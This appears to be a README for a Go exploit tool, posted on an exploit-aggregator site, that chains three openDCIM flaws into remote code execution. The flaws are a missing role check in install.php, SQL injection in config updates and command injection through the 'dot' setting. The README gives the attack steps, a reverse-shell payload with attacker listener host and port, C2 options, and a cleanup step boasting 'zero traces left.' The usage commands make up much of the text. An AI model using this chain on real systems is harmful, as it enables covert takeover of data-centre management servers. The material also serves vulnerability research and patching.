Share
## https://sploitus.com/exploit?id=D3BA2CB3-ACDC-5AE8-8342-B02927C2CC44
# openDCIM - SQLi to RCE via Config Poisoning
Remote code execution chain targeting openDCIM's `install.php` LDAP configuration form. Built on the [VulnCheck go-exploit](https://github.com/vulncheck-oss/go-exploit) framework.
## Vulnerability Chain
| # | CVE | CWE | Description |
|---|-----|-----|-------------|
| 1 | CVE-2026-28515 | CWE-862 | `install.php` performs no role check before the LDAP config form - any user reaches it |
| 2 | CVE-2026-28516 | CWE-89 | `Config::UpdateParameter()` uses string interpolation, stacked queries via PDO+MySQL |
| 3 | CVE-2026-28517 | CWE-78 | `report_network_map.php` passes the `dot` config value directly to `exec()` |
**Affected:** All versions (tested on latest commit `4467e9c4`)
## How It Works
1. POST to `install.php` - SQL injection via LDAP form backs up config, overwrites `dot` with a command payload
2. GET `report_network_map.php` - triggers `exec()`, confirms RCE via `id` output
3. POST to `install.php` - overwrites `dot` with reverse shell payload
4. GET `report_network_map.php` - triggers reverse shell
5. POST to `install.php` - restores all original config values from backup table
Zero traces left in the database after exploitation.
## Build
```bash
go build -o opendcim-exploit .
```
## Usage
### Docker deployments (unauthenticated)
```bash
# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80
# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer
```
### htpasswd deployments (any valid user)
```bash
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass
```
### SSL
```bash
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer
```
## Flags
| Flag | Default | Description |
|------|---------|-------------|
| `-rhost` | | Target host |
| `-rport` | `80` | Target port |
| `-ssl` | `false` | Use HTTPS |
| `-lhost` | | Listener host (for reverse shell) |
| `-lport` | | Listener port (for reverse shell) |
| `-c2` | | C2 type: `SimpleShellServer` or `SSLShellServer` |
| `-username` | | HTTP Basic Auth username (omit for SetEnv deployments) |
| `-password` | | HTTP Basic Auth password (omit for SetEnv deployments) |
| `-a` | | Asset detection (check if target is exploitable) |
| `-e` | | Exploit mode |